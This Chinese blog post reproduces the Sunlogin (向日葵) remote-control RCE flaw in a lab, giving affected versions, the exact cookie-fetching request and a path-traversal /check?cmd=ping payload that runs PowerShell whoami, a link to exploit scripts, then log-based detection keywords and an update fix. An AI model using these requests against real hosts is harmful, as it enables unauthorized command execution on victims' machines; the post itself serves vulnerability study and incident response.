大柚子

这世界不过如此

概述

向日葵远程控制是一款提供远程控制服务的软件。其支持主流操作系统Windows、Linux、Mac、Android、iOS跨平台协同操作,在任何可连入互联网的地点,都可以轻松访问和控制安装了向日葵远程控制客户端的设备。整个远控过程,可通过浏览器直接进行,无需再安装软件。最近向日葵爆出了存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。

影响版本

向日葵个人版 Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315(2021.12)

复现

当向日葵客户端在windows运行时,会连接远程Oray的服务器,开放对外接口,接口由sunlogin处理,且开启监听外部的连接访问端口,大概在50000左右,可通过工具测试,低版本向日葵RCE主要发生在对外开放的接口/check处,当cmd的值为ping/nslookup开头时触发。

这里是我自己的环境,就省略了扫端口环节,我靶机的端口为49815。

首先构造请求,URL为“/cgi-bin/rpc?action=verify-haras”获取cookie值。


GET /cgi-bin/rpc?action=verify-haras HTTP/1.1
Host: 192.168.100.136:49815
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

将上一步获取到的值加入到请求头中,payload如下:


GET <strong>/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami</strong> HTTP/1.1
Host: 192.168.100.136:49815
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
<strong>Cookie: CID=6onb943qKJoXQGAmr1BKArugFlO9949g</strong>

更多利用脚本参考:https://github.com/ce-automne/SunloginRCE

应急排查

向日葵自身日志

向日葵自带有日志记录,包括连接、启动日志。默认在安装根目录下的”log”目录下

根据入侵点,我们可以在日志中查找”check?ping “、“check?nslook”等关键字进行排查。

系统日志排查

在上面的攻击演示中,发现大多会调用powershell,故可以通过排查“windows powershell”日志进行排查。不过因为记录日志的信息有限,只有执行的语句信息。

修复建议

官方已发布新版,更新到最新版本即可。

Print Friendly, PDF & Email

发表回复

您的电子邮箱地址不会被公开。